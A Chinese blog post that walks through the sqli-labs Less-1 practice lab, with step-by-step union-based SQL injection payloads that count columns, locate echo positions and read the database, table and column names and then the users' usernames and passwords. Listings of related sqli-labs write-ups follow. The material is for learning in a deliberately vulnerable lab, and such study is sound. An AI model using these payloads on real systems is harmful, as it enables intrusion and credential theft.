SQL注入之sqlilabs:less-1

最新推荐文章于 2024-05-03 16:47:55 发布
最新推荐文章于 2024-05-03 16:47:55 发布
阅读量3.7k 收藏
点赞数 2
分类专栏: SQL注入 文章标签: sql 数据库 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dmajorcanon/article/details/123058458
版权

题目类型:基于报错的GET单引号字符型注入

测试地址:http://192.168.101.9/sqlilabs/Less-1/?id=1

        访问该网址,页面返回结果如图

0x01 判断注入参数类型

        在URL后添加一个单引号 ,页面报错。根据报错信息判断,此处为字符型注入。

        页面返回结果如图

0x02 判断字段数量

        根据order by语句和错误提示,得出字段数为3。

        Payload -> 192.168.101.9/sqlilabs/Less-1/?id=1' order by 3--+

        页面返回结果如图

0x03 判断是否回显及回显位置

        将前面的id改为-1,根据union语句,得出回显位置为2,3。

        Payload -> 192.168.101.9/sqlilabs/Less-1/?id=-1' union select 1,2,3--+

        如图所示

0x04 查询数据库名称

        根据回显位置,将对应sql语句放置在2和3处。

        Payload -> 192.168.101.9/sqlilabs/Less-1/?id=-1' union select 1,version(),database()--+

        页面返回结果如图

0x05 查询表名

        数据版本为5.0以上,从默认表information_schema中取数。

        Payload ->  192.168.101.9/sqlilabs/Less-1/?id=-1' union select 1,version(),group_concat(table_name) from information_schema.tables where table_schema='security'--+

        页面返回结果如图

0x06 查询列名

        Payload -> 192.168.101.9/sqlilabs/Less-1/?id=-1' union select 1,version(),group_concat(column_name) from information_schema.columns where table_name='users'--+

        页面返回结果如图

0x07 查询数据

        Payload ->  192.168.101.9/sqlilabs/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from users--+

        页面返回结果如图

  Bingo!拿到后台管理员admin

 

Json文乃
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQL注入sqli-labs第三关(less-3)
s_xcx_ah的博客
06-10 2230
sqli第三关简要步骤
SQL注入漏洞学习之二:SQLI-LABS闯关之Less-3和Less-4
m0_71839248的博客
06-10 728
SQLI-LABS闯关之Less-3和Less-4
[网络安全]sqli-labs Less-3 解题详析
等风来
05-01 1832
以上为[网络安全]sqli-labs Less-3 解题详析,后续将分享[网络安全]sqli-labs Less-4 解题详析[网络安全]SQL注入原理及常见攻击方法简析我是秋说,我们下次见。
SQL注入less-1
最新发布
m0_62903168的博客
05-03 907
注:phpstudy默认的php版本为7.x,想要成功的搭建靶场,需要把php版本改为5.x。
sql注入less3
Mdcq123的博客
10-15 324
?id=1’) order by 3%23 http://192.168.197.146/sqli-labs/sqli-labs/Less-3/?id=-1’) union select 1,database(),3%23 http://192.168.197.146/sqli-labs/sqli-labs/Less-3/?id=-1’) union select 1,(select group_...
SQL练习(less-3)字符型注入& union联合查询
AmyBaby00的博客
08-27 441
http://127.0.0.1/sqli/Less-3/?id=1 输入?Id=1’后报错 根据报错信息“1”) 去掉前后两个单引号,和自己输入的一个单引号后还有两个单引号和一个括号,可推出sql注入中的由单引号和括号的闭合模式。 order by 3 查看显示位 (3)并不是固定的,要去试的 union select 查询显示位 联合查询语句:Union select 1,databas...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入...
SQLi-LABS Page-1(Basic Challenges)
07-24
1. **Less-1** 是一个基础的SQL注入实例,它展示了如何利用单引号来触发错误并揭示SQL结构。通过观察错误信息,学习者可以识别注入点并尝试构造SQL语句。 2. **Less-2** 和 **Less-3** 关卡中,学习者需要识别数字...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sqli-labs实验指导手册
11-17
1. **字符型联合注入**(如less-1): - **注入点检测**:通过修改查询参数(如?id=1' and 1=1),观察页面响应变化来判断是否存在注入。 - **闭合方式判断**:通过输入特殊字符(如\)来测试闭合方式,确认是单...
SQL注入sql-labs-Less3~Less37
TenG的博客
12-22 960
前言: 本篇为sql-labs系类第4、5关讲解,由于有些语法第一关已经讲过,所以本篇涉及到前面的知识不会讲解太细,不懂得语句可以参见此系列第一篇,不正确的地方欢迎指正。 关卡: Less-3、Less-4 正文: Less-3: 这里还是让sql语句在浏览器输出(自己在源码里面改,参见第一篇),可以看到sql语句id数值那里和第一关相比多了一对括号,如果我们只在数值后面加一个单引号就注入显然会报错: 注意看输入的sql语句,注释符注释掉了后面的括号,所以注入的时候要在单引号后面加上括号形成闭合,如图:
SQL注入漏洞解析--less-3
duoba_an的博客
02-22 432
3.这里正常回显,当我们后边加上'时可以看到页面报错信息。可推断sql语句是单引号字符型且有括号,所以我们需要闭合单引号且也要考虑括号。2.这个和之前1.2关提示都是一样,所以我们先输入id数字看一下显示什么。5.这样我们就将括号和单引号给绕过,成功绕过之后我们就能正常操作了。4.当我们知道报错信息后,就可以针对报错信息进行注入。6.后边的操作就是和之前两关的操作一样。1.首先我们打开第三关看一下。
sqli-labs—————Less-3
Fly_鹏程万里
05-08 1667
Less-3根据提示传入参数id,数据类型为numeric老样子,用单引号测试报错的内容为:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at...
SQLi-LABS的Less3分析
haoahaoahaoahao的博客
01-15 445
可知id=-1不存在,那么select*from 表名 where (‘id=-1')不动,在url输入的命令union select 1,database(),3会启动。’) 那么--+后面的’)就被注释掉了那么简单理解变为select*from 表名 where id=(‘1‘)id=-1') union select 1,database(),3--+id=-1') union select 1,2,3--+id=1 order by 4 --+id=1’)--+正常。id=1’--+显示。
SQLi-LABS Less-2,联合注入+报错注入_如何判断less-2的注入点
2401_83974660的博客
04-18 409
页面显示数据库的报错信息,符合报错注入的条件。按照第4个字段排序开始报错,确定字段数为:3。页面正常报错,确定报错函数可以使用。
我的白帽之路-SQL注入之数字型注入【sqli-labs Less-2】
Offsett的博客
02-27 372
我的白帽之路
openstack 填坑笔记5:openstack虚拟机上再构建内层openstack(云上云)网络调试
LinBSoft的专栏
05-21 476
openstack 最复杂的部分是网络,这两天调试了网络问题,解决经验值得记录备用我的需求是在学生实践中需要在openstack环境的虚拟机中再构建openstack环境,以供实践实习使用,构建基础是:三个网络在外层openstack构建: 192.168.101.0/24    vxlan  接入外层openstack路由,可以访问外网192.168.103.0/24   vxlan  不连接外...
sqli-labs/Less-2注入
weixin_50339082的博客
06-20 88
sqli-labs/Less-2注入 Sali-lsbs第二关 1、先判断是字符型还是数字型。 http://127.0.0.1/sqli-labs/Less-2/?id=4 127.0.0.1/sqli-labs/Less-2/?id=1 and 1=2 结果一样,说明是数字型。 2、确认字段位数 http://127.0.0.1/sqli-labs/Less-2/?id=3 order by 4 127.0.0.1/sqli-labs/Less-2/?id=3 order by 3 一
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值